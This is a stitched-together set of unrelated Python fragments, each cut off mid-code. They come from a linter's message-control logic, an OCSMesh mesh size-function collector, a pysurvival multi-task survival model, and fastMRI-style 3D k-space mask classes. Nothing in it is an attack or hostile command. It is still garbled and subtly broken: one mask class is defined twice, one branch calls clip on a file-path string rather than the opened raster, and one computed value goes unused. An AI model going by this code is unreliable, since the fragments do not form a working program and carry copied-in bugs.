for r_id, r_title, r_cb in checker.reports:
self.register_report(r_id, r_title, r_cb, checker)
self.register_options_provider(checker)
if hasattr(checker, "msgs"):
self.msgs_store.register_messages_from_checker(checker)
checker.load_defaults()
# Register the checker, but disable all of its messages.
if not getattr(checker, "enabled", True):
self.disable(checker.name)
def enable_fail_on_messages(self):
"""enable 'fail on' msgs
Convert values in config.fail_on (which might be msg category, msg id,
or symbol) to specific msgs, then enable and flag them for later.
"""
fail_on_vals = self.config.fail_on
if not fail_on_vals:
return
fail_on_cats = set()
fail_on_msgs = set()
for val in fail_on_vals:
# If value is a cateogry, add category, else add message
if val in MSG_TYPES:
fail_on_cats.add(val)
else:
fail_on_msgs.add(val)
# For every message in every checker, if cat or msg flagged, enable check
for all_checkers in self._checkers.values():
for checker in all_checkers:
for msg in checker.messages:
if msg.msgid in fail_on_msgs or msg.symbol in fail_on_msgs:
# message id/symbol matched, enable and flag it
self.enable(msg.msgid)
self.fail_on_symbols.append(msg.symbol)
elif msg.msgid[0] in fail_on_cats:
# message starts with a cateogry value, flag (but do not enable) it
self.fail_on_symbols.append(msg.symbol)
def any_fail_on_issues(self):
return any(x in self.fail_on_symbols for x in self.stats["by_msg"])
def disable_noerror_messages(self):
for msgcat, msgids in self.msgs_store._msgs_by_category.items():
# enable only messages with 'error' severity and above ('fatal')
if msgcat in ["E", "F"]:
for msgid in msgids:
self.enable(msgid)
else:
for msgid in msgids:
self.disable(msgid)
def disable_reporters(self):
"""disable all reporters"""
for _reporters in self._reports.values():
for report_id, _, _ in _reporters:
self.disable_report(report_id)
def error_mode(self):
"""error mode: enable only errors; no reports, no persistent"""
self._error_mode = True
self.disable_noerror_messages()
self.disable("miscellaneous")
if self._python3_porting_mode:
self.disable("all")
for msg_id in self._checker_messages("python3"):
if msg_id.startswith("E"):
self.enable(msg_id)
config_parser = self.cfgfile_parser
if config_parser.has_option("MESSAGES CONTROL", "disable"):
value = config_parser.get("MESSAGES CONTROL", "disable")
self.global_set_option("disable", value)
else:
self.disable("python3")
self.set_option("reports", False)
self.set_option("persistent", False)
self.set_option("score", False)
def python3_porting_mode(self):
"""Disable all other checkers and enable Python 3 warnings."""
self.disable("all")
# re-enable some errors, or 'print', 'raise', 'async', 'await' will mistakenly lint fine
self.enable("fatal") # F0001
self.enable("astroid-error") # F0002
self.enable("parse-error") # F0010
self.enable("syntax-error") # E0001
self.enable("python3")
if self._error_mode:
# The error mode was activated, using the -E flag.
# So we'll need to enable only the errors from the
# Python 3 porting checker.
for msg_id in self._checker_messages("python3"):
if msg_id.startswith("E"):
self.enable(msg_id)
else:
self.disable(msg_id)
config_parser = self.cfgfile_parser
if config_parser.has_option("MESSAGES CONTROL", "disable"):
value = config_parser.get("MESSAGES CONTROL", "disable")
self.global_set_option("disable", value)
self._python3_porting_mode = True
def list_messages_enabled(self):
enabled = [
f" {message.symbol} ({message.msgid})"
for message in self.msgs_store.messages
if self.is_message_enabled(message.msgid)
]
disabled = [
f" {message.symbol} ({message.msgid})"
for message in self.msgs_store.messages
if not self.is_message_enabled(message.msgid)
]
print("Enabled messages:")
for msg in sorted(enabled):
print(msg)
print("\nDisabled messages:")
for msg in sorted(disabled):
print(msg)
print("")
# block level option | |
<reponame>yosoyjay/OCSMesh
import os
import gc
import logging
import warnings
import tempfile
from pathlib import Path
from time import time
from multiprocessing import Pool, cpu_count
from copy import copy, deepcopy
from typing import Union, Sequence, List, Tuple
import numpy as np
import geopandas as gpd
from pyproj import CRS, Transformer
from shapely.geometry import MultiPolygon, Polygon, GeometryCollection, box
from shapely import ops
from jigsawpy import jigsaw_msh_t
from rasterio.transform import from_origin
from rasterio.warp import reproject, Resampling
import rasterio
from ocsmesh import utils
from ocsmesh.hfun.base import BaseHfun
from ocsmesh.hfun.raster import HfunRaster
from ocsmesh.hfun.mesh import HfunMesh
from ocsmesh.mesh.mesh import Mesh, EuclideanMesh2D
from ocsmesh.raster import Raster, get_iter_windows
from ocsmesh.features.contour import Contour
from ocsmesh.features.patch import Patch
from ocsmesh.features.channel import Channel
from ocsmesh.features.constraint import (
TopoConstConstraint, TopoFuncConstraint)
_logger = logging.getLogger(__name__)
class RefinementContourInfoCollector:
def __init__(self):
self._contours_info = {}
def add(self, contour_defn, **size_info):
self._contours_info[contour_defn] = size_info
def __iter__(self):
for defn, info in self._contours_info.items():
yield defn, info
class RefinementContourCollector:
def __init__(self, contours_info):
self._contours_info = contours_info
self._container: List[Union[Tuple, None]] = []
def calculate(self, source_list, out_path):
out_dir = Path(out_path)
out_dir.mkdir(exist_ok=True, parents=True)
file_counter = 0
pid = os.getpid()
self._container.clear()
for contour_defn, size_info in self._contours_info:
if not contour_defn.has_source:
# Copy so that in case of a 2nd run the no-source
# contour still gets all current sources
contour_defn = copy(contour_defn)
for source in source_list:
contour_defn.add_source(source)
for contour, crs in contour_defn.iter_contours():
file_counter = file_counter + 1
feather_path = out_dir / f"contour_{pid}_{file_counter}.feather"
crs_path = out_dir / f"crs_{pid}_{file_counter}.json"
gpd.GeoDataFrame(
{ 'geometry': [contour],
'expansion_rate': size_info['expansion_rate'],
'target_size': size_info['target_size'],
},
crs=crs).to_feather(feather_path)
gc.collect()
with open(crs_path, 'w') as fp:
fp.write(crs.to_json())
self._container.append((feather_path, crs_path))
def __iter__(self):
for raster_data in self._container:
feather_path, crs_path = raster_data
gdf = gpd.read_feather(feather_path)
with open(crs_path) as fp:
gdf.set_crs(CRS.from_json(fp.read()))
yield gdf
class ConstantValueContourInfoCollector:
def __init__(self):
self._contours_info = {}
def add(self, src_idx, contour_defn0, contour_defn1, value):
srcs = tuple(src_idx) if src_idx is not None else None
self._contours_info[
(srcs, contour_defn0, contour_defn1)] = value
def __iter__(self):
for defn, info in self._contours_info.items():
yield defn, info
class RefinementPatchInfoCollector:
def __init__(self):
self._patch_info = {}
def add(self, patch_defn, **size_info):
self._patch_info[patch_defn] = size_info
def __iter__(self):
for defn, info in self._patch_info.items():
yield defn, info
class FlowLimiterInfoCollector:
def __init__(self):
self._flow_lim_info = []
def add(self, src_idx, hmin, hmax, upper_bound, lower_bound):
srcs = tuple(src_idx) if src_idx is not None else None
self._flow_lim_info.append(
(src_idx, hmin, hmax, upper_bound, lower_bound))
def __iter__(self):
for src_idx, hmin, hmax, ub, lb in self._flow_lim_info:
yield src_idx, hmin, hmax, ub, lb
class ChannelRefineInfoCollector:
def __init__(self):
self._ch_info_dict = {}
def add(self, channel_defn, **size_info):
self._ch_info_dict[channel_defn] = size_info
def __iter__(self):
for defn, info in self._ch_info_dict.items():
yield defn, info
class ChannelRefineCollector:
def __init__(self, channels_info):
self._channels_info = channels_info
self._container: List[Union[Tuple, None]] = []
def calculate(self, source_list, out_path):
out_dir = Path(out_path)
out_dir.mkdir(exist_ok=True, parents=True)
file_counter = 0
pid = os.getpid()
self._container.clear()
for channel_defn, size_info in self._channels_info:
if not channel_defn.has_source:
# Copy so that in case of a 2nd run the no-source
# channel still gets all current sources
channel_defn = copy(channel_defn)
for source in source_list:
channel_defn.add_source(source)
for channels, crs in channel_defn.iter_channels():
file_counter = file_counter + 1
feather_path = out_dir / f"channels_{pid}_{file_counter}.feather"
crs_path = out_dir / f"crs_{pid}_{file_counter}.json"
gpd.GeoDataFrame(
{ 'geometry': [channels],
'expansion_rate': size_info['expansion_rate'],
'target_size': size_info['target_size'],
},
crs=crs).to_feather(feather_path)
gc.collect()
with open(crs_path, 'w') as fp:
fp.write(crs.to_json())
self._container.append((feather_path, crs_path))
def __iter__(self):
for raster_data in self._container:
feather_path, crs_path = raster_data
gdf = gpd.read_feather(feather_path)
with open(crs_path) as fp:
gdf.set_crs(CRS.from_json(fp.read()))
yield gdf
class ConstraintInfoCollector:
def __init__(self):
self._constraints_info = []
def add(self, src_idx, constraint):
srcs = tuple(src_idx) if src_idx is not None else None
self._constraints_info.append((srcs, constraint))
def __iter__(self):
for defn in self._constraints_info:
yield defn
class HfunCollector(BaseHfun):
def __init__(
self,
in_list: Sequence[
Union[str, Raster, Mesh, HfunRaster, HfunMesh]],
base_mesh: Mesh = None,
hmin: float = None,
hmax: float = None,
nprocs: int = None,
verbosity: int = 0,
method: str = 'exact',
base_as_hfun: bool = True,
base_shape: Union[Polygon, MultiPolygon] = None,
base_shape_crs: Union[str, CRS] = 'EPSG:4326'
):
# NOTE: Input Hfuns and their Rasters can get modified
# Check nprocs
nprocs = -1 if nprocs is None else nprocs
nprocs = cpu_count() if nprocs == -1 else nprocs
self._applied = False
self._size_info = dict(hmin=hmin, hmax=hmax)
self._nprocs = nprocs
self._hfun_list = []
self._method = method
self._base_shape = base_shape
self._base_shape_crs = CRS.from_user_input(base_shape_crs)
self._base_as_hfun = base_as_hfun
# NOTE: Base mesh has to have a crs otherwise HfunMesh throws
# exception
self._base_mesh = None
if base_mesh:
self._base_mesh = HfunMesh(base_mesh)
if self._base_as_hfun:
self._base_mesh.size_from_mesh()
self._contour_info_coll = RefinementContourInfoCollector()
self._contour_coll = RefinementContourCollector(
self._contour_info_coll)
self._const_val_contour_coll = ConstantValueContourInfoCollector()
self._refine_patch_info_coll = RefinementPatchInfoCollector()
self._flow_lim_coll = FlowLimiterInfoCollector()
self._ch_info_coll = ChannelRefineInfoCollector()
self._channels_coll = ChannelRefineCollector(
self._ch_info_coll)
self._constraint_info_coll = ConstraintInfoCollector()
self._type_chk(in_list)
# TODO: Interpolate max size on base mesh basemesh?
#
# TODO: CRS considerations
for in_item in in_list:
# Add supports(ext) to each hfun type?
if isinstance(in_item, BaseHfun):
hfun = in_item
elif isinstance(in_item, Raster):
if self._base_shape:
clip_shape = self._base_shape
if not self._base_shape_crs.equals(in_item.crs):
transformer = Transformer.from_crs(
self._base_shape_crs, in_item.crs, always_xy=True)
clip_shape = ops.transform(
transformer.transform, clip_shape)
try:
in_item.clip(clip_shape)
except ValueError as err:
# This raster does not intersect shape
_logger.debug(err)
continue
elif self._base_mesh:
try:
in_item.clip(self._base_mesh.mesh.get_bbox(crs=in_item.crs))
except ValueError as err:
# This raster does not intersect shape
_logger.debug(err)
continue
hfun = HfunRaster(in_item, **self._size_info)
elif isinstance(in_item, EuclideanMesh2D):
hfun = HfunMesh(in_item)
elif isinstance(in_item, str):
if in_item.endswith('.tif'):
raster = Raster(in_item)
if self._base_shape:
clip_shape = self._base_shape
if not self._base_shape_crs.equals(raster.crs):
transformer = Transformer.from_crs(
self._base_shape_crs, raster.crs, always_xy=True)
clip_shape = ops.transform(
transformer.transform, clip_shape)
try:
in_item.clip(clip_shape)
except ValueError as err:
# This raster does not intersect shape
_logger.debug(err)
continue
elif self._base_mesh:
try:
raster.clip(self._base_mesh.mesh.get_bbox(crs=raster.crs))
except ValueError as err:
# This raster does not intersect shape
_logger.debug(err)
continue
hfun = HfunRaster(raster, **self._size_info)
elif in_item.endswith(
('.14', '.grd', '.gr3', '.msh', '.2dm')):
mesh = Mesh.open(in_item)
hfun = HfunMesh(mesh)
else:
raise TypeError("Input file extension not supported!")
self._hfun_list.append(hfun)
def msh_t(self) -> jigsaw_msh_t:
composite_hfun = jigsaw_msh_t()
if self._method == 'exact':
self._apply_features()
with tempfile.TemporaryDirectory() as temp_dir:
hfun_path_list = self._write_hfun_to_disk(temp_dir)
composite_hfun = self._get_hfun_composite(hfun_path_list)
elif self._method == 'fast':
with tempfile.TemporaryDirectory() as temp_dir:
rast = self._create_big_raster(temp_dir)
hfun = self._apply_features_fast(rast)
composite_hfun = self._get_hfun_composite_fast(hfun)
else:
raise ValueError(f"Invalid method specified: {self._method}")
return composite_hfun
def add_topo_bound_constraint(
self,
value,
upper_bound=np.inf,
lower_bound=-np.inf,
value_type: str = 'min',
rate=0.01,
source_index: Union[List[int], int, None] = None):
self._applied = False
constraint_defn = TopoConstConstraint(
value, upper_bound, lower_bound, value_type, rate)
if source_index is not None and not isinstance(source_index, (tuple, list)):
source_index = [source_index]
self._constraint_info_coll.add(source_index, constraint_defn)
def add_topo_func_constraint(
self,
func=lambda i: i / 2.0,
upper_bound=np.inf,
lower_bound=-np.inf,
value_type: str = 'min',
rate=0.01,
source_index: Union[List[int], int, None] = None):
self._applied = False
constraint_defn = TopoFuncConstraint(
func, upper_bound, lower_bound, value_type, rate)
if source_index is not None and not isinstance(source_index, (tuple, list)):
source_index = [source_index]
self._constraint_info_coll.add(source_index, constraint_defn)
def add_contour(
self,
level: Union[List[float], float] = None,
expansion_rate: float = 0.01,
target_size: float = None,
contour_defn: Contour = None,
):
'''
Contours are defined by contour defn or by raster sources only,
but are applied on both raster and mesh hfun
'''
# Always lazy
self._applied = False
levels = []
if isinstance(level, (list, tuple)):
levels.extend(level)
else:
levels.append(level)
contour_defns = []
if contour_defn is None:
for lvl in levels:
contour_defns.append(Contour(level=lvl))
elif not isinstance(contour_defn, Contour):
raise TypeError(
f"Contour definition must be of type {Contour} not"
f" {type(contour_defn)}!")
elif level is not None:
msg = "Level is ignored since a contour definition is provided!"
warnings.warn(msg)
_logger.info(msg)
else:
contour_defns.append(contour_defn)
for ctr_dfn in contour_defns:
self._contour_info_coll.add(
ctr_dfn,
expansion_rate=expansion_rate,
target_size=target_size)
def add_channel(
self,
level: float = 0,
width: float = 1000, # in meters
target_size: float = 200,
expansion_rate: float = None,
tolerance: Union[None, float] = 50,
channel_defn = None):
self._applied = False
# Always lazy
self._applied = False
# Even a tolerance of 1 for simplifying polygon for channel
# calculations is much faster than no simplification. 50
# is much faster than 1. The reason is in simplify we don't
# preserve topology
if channel_defn is None:
channel_defn = Channel(
level=level, width=width, tolerance=tolerance)
elif not isinstance(channel_defn, Channel):
raise TypeError(
f"Channel definition must be of type {Channel} not"
f" {type(channel_defn)}!")
self._ch_info_coll.add(
channel_defn,
expansion_rate=expansion_rate,
target_size=target_size)
def add_subtidal_flow_limiter(
self,
hmin=None,
hmax=None,
upper_bound=None,
lower_bound=None,
source_index: Union[List[int], int, None] = None):
self._applied = False
if source_index is not None and not isinstance(source_index, (tuple, list)):
source_index = [source_index]
# TODO: Checks on hmin/hmax, etc?
self._flow_lim_coll.add(
source_index,
hmin=hmin,
hmax=hmax,
upper_bound=upper_bound,
lower_bound=lower_bound)
def add_constant_value(
self, value,
lower_bound=None,
upper_bound=None,
source_index: Union[List[int], int, None] =None):
self._applied = False
contour_defn0 = None
contour_defn1 = None
if lower_bound is not None and not | |
<gh_stars>0
from __future__ import absolute_import
import torch
import numpy as np
import copy
import multiprocessing
from pysurvival import HAS_GPU
from pysurvival import utils
from pysurvival.utils import neural_networks as nn
from pysurvival.utils import optimization as opt
from pysurvival.models import BaseModel
import sys
# %matplotlib inline
class BaseMultiTaskModel(BaseModel):
""" Base class for all Multi-Task estimators:
* Multi-Task Logistic Regression model (MTLR)
* Neural Multi-Task Logistic Regression model (N-MTLR)
BaseMultiTaskModel shouldn't be used as is.
The underlying model is written in PyTorch.
The original Multi-Task model, a.k.a the Multi-Task Logistic Regression
model (MTLR), was first introduced by <NAME> al. in
*Learning Patient-Specific Cancer Survival Distributions as a Sequence of
Dependent Regressors*
The Neural Multi-Task Logistic Regression model (N-MTLR) was developed
by <NAME> in the paper *Deep Neural Networks for Survival
Analysis Based on a Multi-Task Framework*, allowing the use of
Neural Networks within the original design.
Parameters
----------
* `structure`: **list of dictionaries** --
Provides the structure of the MLP built within the N-MTLR.
ex: `structure = [ {'activation': 'ReLU', 'num_units': 128}, ]`.
Each dictionary corresponds to a fully connected hidden layer:
* `num_units` is the number of hidden units in this layer
* `activation` is the activation function that will be used.
The list of all available activation functions can be found :
* Atan
* BentIdentity
* BipolarSigmoid
* CosReLU
* ELU
* Gaussian
* Hardtanh
* Identity
* InverseSqrt
* LeakyReLU
* LeCunTanh
* LogLog
* LogSigmoid
* ReLU
* SELU
* Sigmoid
* Sinc
* SinReLU
* Softmax
* Softplus
* Softsign
* Swish
* Tanh
In case there are more than one dictionary,
each hidden layer will be applied in the resulting MLP,
using the order it is provided in the structure:
ex: structure = [ {'activation': 'relu', 'num_units': 128},
{'activation': 'tanh', 'num_units': 128}, ]
* `bins`: **int** *(default=100)* --
Number of subdivisions of the time axis
* `auto_scaler`: **boolean** *(default=True)* --
Determines whether a sklearn scaler should be automatically applied
"""
def __init__(self, structure, bins=100, auto_scaler=True):
# Saving the attributes
self.loss_values = []
self.bins = bins
self.structure = structure
# Initializing the elements from BaseModel
super(BaseMultiTaskModel, self).__init__(auto_scaler)
def get_times(self, T, is_min_time_zero=True, extra_pct_time=0.1):
""" Building the time axis (self.times) as well as the time intervals
( all the [ t(k-1), t(k) ) in the time axis.
"""
# Setting the min_time and max_time
max_time = max(T)
if is_min_time_zero:
min_time = 0.
else:
min_time = min(T)
# Setting optional extra percentage time
if 0. <= extra_pct_time <= 1.:
p = extra_pct_time
else:
raise Exception("extra_pct_time has to be between [0, 1].")
# Building time points and time buckets
self.times = np.linspace(min_time, max_time * (1. + p), self.bins)
self.get_time_buckets()
self.num_times = len(self.time_buckets)
def compute_XY(self, X, T, E, is_min_time_zero, extra_pct_time):
""" Given the survival_times, events and time_points vectors,
it returns a ndarray of the encodings for all units
such that:
Y = [[0, 0, 1, 0, 0], # unit experienced an event at t = 3
[0, 1, 0, 0, 0], # unit experienced an event at t = 2
[0, 1, 1, 1, 1],] # unit was censored at t = 2
"""
# building times axis
self.get_times(T, is_min_time_zero, extra_pct_time)
n_units = T.shape[0]
# Initializing the output variable
Y_cens, Y_uncens = [], []
X_cens, X_uncens = [], []
if isinstance(X, list):
for input_ in X:
X_cens.append([])
X_uncens.append([])
# Building the output variable
for i, (t, e) in enumerate(zip(T, E)):
y = np.zeros(self.num_times + 1)
min_abs_value = [abs(a_j_1 - t) for (a_j_1, a_j) in self.time_buckets]
index = np.argmin(min_abs_value)
if e == 1:
y[index] = 1.
if isinstance(X, list):
for j, input_ in enumerate(X):
X_uncens[j].append(input_[i, :].tolist())
else:
X_uncens.append(X[i, :].tolist())
Y_uncens.append(y.tolist())
else:
y[(index):] = 1.
if isinstance(X, list):
for j, input_ in enumerate(X):
X_cens[j].append(input_[i, :].tolist())
else:
X_cens.append(X[i, :].tolist())
Y_cens.append(y.tolist())
# Transform into torch.Tensor
if isinstance(X, list):
for j, input_ in enumerate(X_cens):
X_cens[j] = torch.FloatTensor(input_)
if torch.cuda.is_available():
X_cens[j] = X_cens[j].cuda()
for j, input_ in enumerate(X_uncens):
X_uncens[j] = torch.FloatTensor(input_)
if torch.cuda.is_available():
X_uncens[j] = X_uncens[j].cuda()
else:
X_cens = torch.FloatTensor(X_cens)
X_uncens = torch.FloatTensor(X_uncens)
if torch.cuda.is_available():
X_cens = X_cens.cuda()
X_uncens = X_uncens.cuda()
Y_cens = torch.FloatTensor(Y_cens)
Y_uncens = torch.FloatTensor(Y_uncens)
if torch.cuda.is_available():
Y_cens = Y_cens.cuda()
Y_uncens = Y_uncens.cuda()
return X_cens, X_uncens, Y_cens, Y_uncens
def loss_function(self, model, X_cens, X_uncens, Y_cens, Y_uncens,
Triangle, l2_reg, l2_smooth, min_clamp_value=1e-8,
max_clamp_value=torch.finfo(torch.float32).max-1):
""" Computes the loss function of the any MTLR model.
All the operations have been vectorized to ensure optimal speed
"""
score_cens = model(X_cens)
score_uncens = model(X_uncens)
# Likelihood Calculations -- Uncensored
temp = torch.clamp(torch.mm(score_uncens, Triangle), min=1e-8, max=88.5)
phi_uncens = torch.clamp(torch.exp(temp), max=max_clamp_value)
reduc_phi_uncens = torch.sum(phi_uncens * Y_uncens, dim=1)
# Likelihood Calculations -- Censored
temp = torch.clamp(torch.mm(score_cens, Triangle), min=1e-8, max=88.5)
phi_cens = torch.clamp(torch.exp(temp), max=max_clamp_value)
reduc_phi_cens = torch.sum(phi_cens * Y_cens, dim=1)
# Likelihood Calculations -- Normalization
temp = torch.clamp(torch.mm(score_uncens, Triangle), min=1e-8, max=88.5)
z_uncens = torch.clamp(torch.exp(temp), max=max_clamp_value)
reduc_z_uncens = torch.sum(z_uncens, dim=1)
temp = torch.clamp(torch.mm(score_cens, Triangle), min=1e-8, max=88.5)
z_cens = torch.clamp(torch.exp(temp), max=max_clamp_value)
reduc_z_cens = torch.sum(z_cens, dim=1)
reduc_phi_uncens = torch.clamp(reduc_phi_uncens, min=min_clamp_value, max=max_clamp_value)
reduc_phi_cens = torch.clamp(reduc_phi_cens, min=min_clamp_value, max=max_clamp_value)
reduc_z_uncens = torch.clamp(reduc_z_uncens, min=min_clamp_value, max=max_clamp_value)
reduc_z_cens = torch.clamp(reduc_z_cens, min=min_clamp_value, max=max_clamp_value)
# MTLR cost function
loss = - (
torch.sum(torch.log(reduc_phi_uncens))
+ torch.sum(torch.log(reduc_phi_cens))
- torch.sum(torch.log(reduc_z_uncens))
- torch.sum(torch.log(reduc_z_cens))
)
# print(f"loss_loss: {loss}")
# Adding the regularized loss
nb_set_parameters = len(list(model.parameters()))
for i, w in enumerate(model.parameters()):
loss += l2_reg * torch.sum(w * w) / 2.
if i >= nb_set_parameters - 2:
loss += l2_smooth * norm_diff(w)
return loss
def fit(self, X, T, E, init_method='glorot_uniform', optimizer='adam',
lr=1e-4, num_epochs=1000, dropout=0.2, l2_reg=1e-2,
l2_smooth=1e-2, batch_normalization=False, bn_and_dropout=False,
verbose=True, extra_pct_time=0.1, is_min_time_zero=True, max_norm=1.0,
min_clamp_value=1e-8, max_clamp_value=torch.finfo(torch.float32).max -1):
""" Fit the estimator based on the given parameters.
Parameters:
-----------
* `X` : **array-like**, *shape=(n_samples, n_features)* --
The input samples.
* `T` : **array-like** --
The target values describing when the event of interest or censoring
occurred.
* `E` : **array-like** --
The values that indicate if the event of interest occurred i.e.:
E[i]=1 corresponds to an event, and E[i] = 0 means censoring,
for all i.
* `init_method` : **str** *(default = 'glorot_uniform')* --
Initialization method to use. Here are the possible options:
* `glorot_uniform`: Glorot/Xavier uniform initializer
* `he_uniform`: He uniform variance scaling initializer
* `uniform`: Initializing tensors with uniform (-1, 1) distribution
* `glorot_normal`: Glorot normal initializer,
* `he_normal`: He normal initializer.
* `normal`: Initializing tensors with standard normal distribution
* `ones`: Initializing tensors to 1
* `zeros`: Initializing tensors to 0
* `orthogonal`: Initializing tensors with a orthogonal matrix,
* `optimizer`: **str** *(default = 'adam')* --
iterative method for optimizing a differentiable objective function.
Here are the possible options:
- `adadelta`
- `adagrad`
- `adam`
- `adamax`
- `rmsprop`
- `sparseadam`
- `sgd`
* `lr`: **float** *(default=1e-4)* --
learning rate used in the optimization
* `num_epochs`: **int** *(default=1000)* --
The number of iterations in the optimization
* `dropout`: **float** *(default=0.5)* --
Randomly sets a fraction rate of input units to 0
at each update during training time, which helps prevent overfitting.
* `l2_reg`: **float** *(default=1e-4)* --
L2 regularization parameter for the model coefficients
* `l2_smooth`: **float** *(default=1e-4)* --
Second L2 regularizer that ensures the parameters vary smoothly
across consecutive time points.
* `batch_normalization`: **bool** *(default=True)* --
Applying Batch Normalization or not
* `bn_and_dropout`: **bool** *(default=False)* --
Applying Batch Normalization and Dropout at the same time
* `display_loss`: **bool** *(default=True)* --
Whether or not showing the loss function values at each update
* `verbose`: **bool** *(default=True)* --
Whether or not producing detailed logging about the modeling
* `extra_pct_time`: **float** *(default=0.1)* --
Providing an extra fraction of time in the time axis
* `is_min_time_zero`: **bool** *(default=True)* --
Whether the the time axis starts at 0
* `max_norm`: **float** *(default=1.0)* --
Max l2 norm for gradient clipping
**Returns:**
* self : object
Example:
--------
#### 1 - Importing packages
import | |
lines are spaced exactly evenly, as is done in standard GRAPPA-style
acquisitions. This means that with a densely-sampled center,
``acceleration`` will be greater than the true acceleration rate.
"""
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Not used.
Returns:
A mask for the high spatial frequencies of k-space.
"""
if offset is None:
offset = self.rng.randint(0, high=round(acceleration))
mask = np.zeros(num_cols, dtype=np.float32)
mask[offset::acceleration] = 1
return mask
class EquispacedMaskFractionFunc(MaskFunc):
"""
Equispaced mask with exact acceleration matching.
The mask selects a subset of columns from the input k-space data. If the
k-space data has N columns, the mask picks out:
1. N_low_freqs = (N * center_fraction) columns in the center
corresponding tovlow-frequencies.
2. The other columns are selected with equal spacing at a proportion
that reaches the desired acceleration rate taking into consideration
the number of low frequencies. This ensures that the expected number
of columns selected is equal to (N / acceleration)
It is possible to use multiple center_fractions and accelerations, in which
case one possible (center_fraction, acceleration) is chosen uniformly at
random each time the EquispacedMaskFunc object is called.
Note that this function may not give equispaced samples (documented in
https://github.com/facebookresearch/fastMRI/issues/54), which will require
modifications to standard GRAPPA approaches. Nonetheless, this aspect of
the function has been preserved to match the public multicoil data.
"""
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
# determine acceleration rate by adjusting for the number of low frequencies
adjusted_accel = (acceleration * (num_low_frequencies - num_cols)) / (
num_low_frequencies * acceleration - num_cols
)
if offset is None:
offset = self.rng.randint(0, high=round(adjusted_accel))
mask = np.zeros(num_cols)
accel_samples = np.arange(offset, num_cols - 1, adjusted_accel)
accel_samples = np.around(accel_samples).astype(np.uint)
mask[accel_samples] = 1.0
return mask
class EquispacedMaskFractionFunc3D(MaskFunc3D):
def __init__(self, center_fractions, accelerations, allow_any_combination=False, seed=None):
super().__init__(center_fractions, accelerations, allow_any_combination, seed)
# self.eliptical_mask = np.load(os.path.join(os.path.dirname(__file__), "kspace_eliptical_mask.npy")).astype(float)
self.offset_mask = 0
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
if self.offset_mask > 3:
self.offset_mask = 0
mask = np.zeros((shape[-3], shape[-2]))
mask_offset = self.offset_mask % 2
phase_offset = self.offset_mask // 2
mask[mask_offset::3, phase_offset::3] = 1.0
self.offset_mask += 1
return mask
class EquispacedMaskFractionFunc3D(MaskFunc3D):
def __init__(self, center_fractions, accelerations, allow_any_combination=False, seed=None):
super().__init__(center_fractions, accelerations, allow_any_combination, seed)
# self.eliptical_mask = np.load(os.path.join(os.path.dirname(__file__), "kspace_eliptical_mask.npy")).astype(float)
self.offset_mask = 0
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
if self.offset_mask > 3:
self.offset_mask = 0
mask = np.zeros((shape[-3], shape[-2]))
mask_offset = self.offset_mask % 2
phase_offset = self.offset_mask // 2
mask[mask_offset::3, phase_offset::3] = 1.0
self.offset_mask += 1
return mask
class EquispacedMaskFractionFuncCenterDense3D(MaskFunc3D):
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed
) -> np.ndarray:
mask_offset = phase_offset = 0
mask = np.zeros((shape[-3], shape[-2]))
mask[mask_offset::4, phase_offset::4] = 1.0
mask[5:15:2, 32:-32:2] = 1
return mask
class VariableDensitiyMask3D(MaskFunc3D):
def __init__(self, accelerations, allow_any_combination=False, seed=None):
super().__init__([0], accelerations, allow_any_combination, seed)
self.rng_new = np.random.default_rng(seed)
self.num_samples = 300
def draw_samples(self, shape, acceleration):
tol = 0.1
while True:
s = self.rng_new.multivariate_normal([shape[1] // 2, shape[2] // 2], [[15, 0], [0, 500]], self.num_samples)
s[:, 0] = np.clip(s[:, 0], 0, shape[1] - 1)
s[:, 1] = np.clip(s[:, 1], 0, shape[2] - 1)
s = s.astype(int)
mask = np.zeros(shape[1:-1], dtype=bool)
mask[s[:, 0], s[:, 1]] = True
# Dense center sampling
mask[int(mask.shape[0] * 3 / 8):int(mask.shape[0] * 5 / 8),
int(mask.shape[1] * 9 / 20):int(mask.shape[1] * 11 / 20)] = True
R = 1 / (np.sum(mask) / (mask.shape[0] * mask.shape[1]))
if R > acceleration:
self.num_samples += 50
elif R < acceleration:
self.num_samples -= 50
if np.abs(acceleration - R) < tol:
return mask
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed,
) -> np.ndarray:
self.rng_new = np.random.default_rng(seed)
mask = self.draw_samples(shape, acceleration)
return mask[None]
class PoissonDensitiyMask3D(MaskFunc3D):
def __init__(self, accelerations, allow_any_combination=False, seed=None, cached=True):
super().__init__([0], accelerations, allow_any_combination, seed)
self.rng_new = np.random.default_rng(seed)
self.poisson_radius = 0.0125
self.rng_new = np.random.default_rng(seed)
self.cached = cached
if cached:
